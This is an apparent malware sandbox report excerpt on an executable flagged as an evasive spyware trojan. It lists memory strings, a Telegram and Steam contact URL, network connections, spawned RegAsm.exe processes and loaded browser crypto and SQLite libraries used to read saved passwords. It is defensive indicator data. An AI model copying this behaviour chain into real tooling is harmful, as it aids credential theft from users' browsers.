                      Source: IIJDBGDGCGDAKFIDGIDBFIEHDH.3.drString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
                      Source: RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, EGIDAAFI.3.drString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
                      Source: EGIDAAFI.3.drString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
                      Source: RegAsm.exe, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, EGIDAAFI.3.drString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
                      Source: EGIDAAFI.3.drString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
                      Source: RegAsm.exe, 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17rer.exe
                      Source: file.exe, 00000000.00000002.1702569185.0000000003EC5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, RegAsm.exe, 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://t.me/sa9ok
                      Source: nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: https://www.digicert.com/CPS0
                      Source: ECFHIJKJ.3.drString found in binary or memory: https://www.ecosia.org/newtab/
                      Source: ECFHIJKJ.3.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                      Source: IIJDBGDGCGDAKFIDGIDBFIEHDH.3.drString found in binary or memory: https://www.mozilla.org
                      Source: RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/
                      Source: IIJDBGDGCGDAKFIDGIDBFIEHDH.3.drString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
                      Source: RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/ost.exe
                      Source: RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/
                      Source: IIJDBGDGCGDAKFIDGIDBFIEHDH.3.drString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
                      Source: RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/xe
                      Source: RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
                      Source: IIJDBGDGCGDAKFIDGIDBFIEHDH.3.drString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                      Source: RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/vchost.exe
                      Source: IIJDBGDGCGDAKFIDGIDBFIEHDH.3.drString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                      Source: RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/
                      Source: RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/chost.exe
                      Source: IIJDBGDGCGDAKFIDGIDBFIEHDH.3.drString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                      Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.drString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
                      Source: unknown | HTTPS traffic detected: 104.112.44.153:443 -> 192.168.2.4:49731 version: TLS 1.2
                      Source: unknown | HTTPS traffic detected: 78.46.229.36:443 -> 192.168.2.4:49732 version: TLS 1.2
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 3_2_00411BD0 memset,GetDesktopWindow,GetWindowRect,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GlobalFix,GlobalSize,SelectObject,DeleteObject,DeleteObject,ReleaseDC,CloseWindow

                      System Summary

                      Source: file.exe, RemoteObjects.cs | Large array initialization: RemoteObjects: array initializer size 208384
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 3_2_6C6FED10 malloc,NtFlushVirtualMemory,memset,memset,memset,memset,memset,memcpy,free,memset,memset,memcpy,memset,memset,memset,memset,memset
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 3_2_6C73B8C0 rand_s,NtQueryVirtualMemory
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 3_2_6C73B910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 3_2_6C73B700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 3_2_6C6DF280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00402290 appears 286 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 6C9709D0 appears 99 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 6C7194D0 appears 88 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 6C70CBE8 appears 134 times
                      Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7472 -s 932
                      Source: file.exeStatic PE information: invalid certificate
                      Source: file.exe, 00000000.00000002.1701772300.0000000002EC3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameFriendly.exe4 vs file.exe
                      Source: file.exe, 00000000.00000002.1701210814.000000000103E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs file.exe
                      Source: file.exe, 00000000.00000000.1613149582.0000000000C5A000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameFriendly.exe4 vs file.exe
                      Source: file.exeBinary or memory string: OriginalFilenameFriendly.exe4 vs file.exe
                      Source: C:\Users\user\Desktop\file.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rstrtmgr.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dbghelp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sxs.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mozglue.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wsock32.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: vcruntime140.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msvcp140.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windowscodecs.dllJump to behavior
                      Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/30@1/2
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C737030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree,3_2_6C737030
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00410950 CreateToolhelp32Snapshot,Process32First,Process32Next,Process32Next,CloseHandle,3_2_00410950
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004110A0 CoInitializeEx,CoInitializeSecurity,CoCreateInstance,CoSetProxyBlanket,VariantInit,VariantClear,3_2_004110A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\76561199658817715[1].htmJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7472
                      Source: C:\Users\user\Desktop\file.exeMutant created: NULL
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7480:120:WilError_03
                      Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\dba7a0c9-4f22-4d27-8173-863aa989d419Jump to behavior
                      Source: file.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                      Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: softokn3[1].dll.3.dr, softokn3.dll.3.drBinary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
                      Source: RegAsm.exe, 00000003.00000002.1982253965.0000000019EB8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1986649501.000000006C97F000.00000002.00000001.01000000.00000009.sdmp, RegAsm.exe, 00000003.00000002.1977760885.0000000013F4C000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, sqlm[1].dll.3.dr, nss3.dll.3.drBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                      Source: softokn3[1].dll.3.dr, softokn3.dll.3.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;
                      Source: RegAsm.exe, 00000003.00000002.1982253965.0000000019EB8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1986649501.000000006C97F000.00000002.00000001.01000000.00000009.sdmp, RegAsm.exe, 00000003.00000002.1977760885.0000000013F4C000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, sqlm[1].dll.3.dr, nss3.dll.3.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                      Source: RegAsm.exe, 00000003.00000002.1982253965.0000000019EB8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1986649501.000000006C97F000.00000002.00000001.01000000.00000009.sdmp, RegAsm.exe, 00000003.00000002.1977760885.0000000013F4C000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, sqlm[1].dll.3.dr, nss3.dll.3.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                      Source: RegAsm.exe, 00000003.00000002.1982253965.0000000019EB8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1986649501.000000006C97F000.00000002.00000001.01000000.00000009.sdmp, RegAsm.exe, 00000003.00000002.1977760885.0000000013F4C000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, sqlm[1].dll.3.dr, nss3.dll.3.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                      Source: softokn3[1].dll.3.dr, softokn3.dll.3.drBinary or memory string: UPDATE %s SET %s WHERE id=$ID;
                      Source: RegAsm.exe, 00000003.00000002.1982253965.0000000019EB8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1977760885.0000000013F4C000.00000004.00000020.00020000.00000000.sdmp, sqlm[1].dll.3.drBinary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
                      Source: softokn3[1].dll.3.dr, softokn3.dll.3.drBinary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
                      Source: softokn3[1].dll.3.dr, softokn3.dll.3.drBinary or memory string: SELECT ALL id FROM %s WHERE %s;
                      Source: softokn3[1].dll.3.dr, softokn3.dll.3.drBinary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
                      Source: RegAsm.exe, 00000003.00000002.1982253965.0000000019EB8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1977760885.0000000013F4C000.00000004.00000020.00020000.00000000.sdmp, sqlm[1].dll.3.drBinary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
                      Source: softokn3[1].dll.3.dr, softokn3.dll.3.drBinary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
                      Source: RegAsm.exe, RegAsm.exe, 00000003.00000002.1982253965.0000000019EB8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1986649501.000000006C97F000.00000002.00000001.01000000.00000009.sdmp, RegAsm.exe, 00000003.00000002.1977760885.0000000013F4C000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, sqlm[1].dll.3.dr, nss3.dll.3.drBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                      Source: RegAsm.exe, 00000003.00000002.1982253965.0000000019EB8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1986649501.000000006C97F000.00000002.00000001.01000000.00000009.sdmp, RegAsm.exe, 00000003.00000002.1977760885.0000000013F4C000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, sqlm[1].dll.3.dr, nss3.dll.3.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                      Source: softokn3[1].dll.3.dr, softokn3.dll.3.drBinary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
                      Source: RegAsm.exe, 00000003.00000002.1982253965.0000000019EB8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1977760885.0000000013F4C000.00000004.00000020.00020000.00000000.sdmp, sqlm[1].dll.3.drBinary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
                      Source: GHDHDBAECGCAFHJJDAKF.3.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                      Source: RegAsm.exe, 00000003.00000002.1982253965.0000000019EB8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1977760885.0000000013F4C000.00000004.00000020.00020000.00000000.sdmp, sqlm[1].dll.3.drBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                      Source: softokn3[1].dll.3.dr, softokn3.dll.3.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
                      Source: RegAsm.exe, 00000003.00000002.1982253965.0000000019EB8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1977760885.0000000013F4C000.00000004.00000020.00020000.00000000.sdmp, sqlm[1].dll.3.drBinary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
                      Source: softokn3[1].dll.3.dr, softokn3.dll.3.drBinary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
                      Source: file.exeVirustotal: Detection: 29%
                      Source: RegAsm.exeString found in binary or memory: t-keys-7d48285b-20e8-4b9b-91ad-216e34163bad?wt.mc_id=enterpk2016&ui=en-us&rs=en-us&ad=us https://support.microsoft.com/en-us/topic/install-the-english-language-pack-for-32-bit-office-94ba2e0b-638e-4a92-8857-2cb5ac1d8e17?ui=en-us&rs=en-us&ad=us https://support.
                      Source: RegAsm.exeString found in binary or memory: 48285b-20e8-4b9b-91ad-216e34163bad?wt.mc_id=enterpk2016&ui=en-us&rs=en-us&ad=us https://support.microsoft.com/en-us/topic/install-the-english-language-pack-for-32-bit-office-94ba2e0b-638e-4a92-8857-2cb5ac1d8e17?ui=en-us&rs=en-us&ad=us https://support.office.co
                      Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                      Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                      Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7472 -s 932
                      Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: file.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: mozglue.pdbP source: RegAsm.exe, 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.3.dr, mozglue.dll.3.dr
                      Source: Binary string: freebl3.pdb source: freebl3[1].dll.3.dr, freebl3.dll.3.dr
                      Source: Binary string: freebl3.pdbp source: freebl3[1].dll.3.dr, freebl3.dll.3.dr
                      Source: Binary string: nss3.pdb@ source: RegAsm.exe, 00000003.00000002.1986649501.000000006C97F000.00000002.00000001.01000000.00000009.sdmp, nss3[1].dll.3.dr, nss3.dll.3.dr
                      Source: Binary string: mscorlib.pdb source: WERD260.tmp.dmp.6.dr
                      Source: Binary string: System.ni.pdbRSDS source: WERD260.tmp.dmp.6.dr
                      Source: Binary string: mscorlib.ni.pdb source: WERD260.tmp.dmp.6.dr
                      Source: Binary string: Friendly.pdb source: WERD260.tmp.dmp.6.dr
                      Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.3.dr, softokn3.dll.3.dr
                      Source: Binary string: System.pdb4 source: WERD260.tmp.dmp.6.dr
                      Source: Binary string: System.Core.pdb source: WERD260.tmp.dmp.6.dr
                      Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.3.dr, vcruntime140[1].dll.3.dr
                      Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.3.dr, msvcp140.dll.3.dr
                      Source: Binary string: nss3.pdb source: RegAsm.exe, 00000003.00000002.1986649501.000000006C97F000.00000002.00000001.01000000.00000009.sdmp, nss3[1].dll.3.dr, nss3.dll.3.dr
                      Source: Binary string: mscorlib.ni.pdbRSDS source: WERD260.tmp.dmp.6.dr
                      Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: RegAsm.exe, 00000003.00000002.1982253965.0000000019EB8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1977760885.0000000013F4C000.00000004.00000020.00020000.00000000.sdmp, sqlm[1].dll.3.dr
                      Source: Binary string: mozglue.pdb source: RegAsm.exe, 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.3.dr, mozglue.dll.3.dr
                      Source: Binary string: c:\nconvxoz3\obj\Release\Friendly.pdb source: file.exe
                      Source: Binary string: softokn3.pdb source: softokn3[1].dll.3.dr, softokn3.dll.3.dr
                      Source: Binary string: System.ni.pdb source: WERD260.tmp.dmp.6.dr
                      Source: Binary string: System.pdb source: WERD260.tmp.dmp.6.dr
                      Source: Binary string: System.Core.ni.pdbRSDS source: WERD260.tmp.dmp.6.dr
                      Source: Binary string: System.Core.ni.pdb source: WERD260.tmp.dmp.6.dr
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004181D0 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,3_2_004181D0
                      Source: msvcp140.dll.3.drStatic PE information: section name: .didat
                      Source: msvcp140[1].dll.3.drStatic PE information: section name: .didat
                      Source: nss3.dll.3.drStatic PE information: section name: .00cfg
                      Source: nss3[1].dll.3.drStatic PE information: section name: .00cfg
                      Source: softokn3.dll.3.drStatic PE information: section name: .00cfg
                      Source: softokn3[1].dll.3.drStatic PE information: section name: .00cfg
                      Source: sqlm[1].dll.3.drStatic PE information: section name: .00cfg
